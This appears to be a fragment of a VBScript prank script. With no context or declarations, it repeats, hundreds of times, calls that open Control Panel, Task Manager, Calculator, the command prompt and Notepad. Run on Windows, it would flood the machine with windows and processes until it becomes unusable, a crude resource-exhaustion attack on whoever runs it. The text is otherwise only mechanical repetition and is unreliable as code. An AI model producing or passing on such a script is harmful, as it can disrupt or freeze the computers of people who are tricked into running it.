
objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

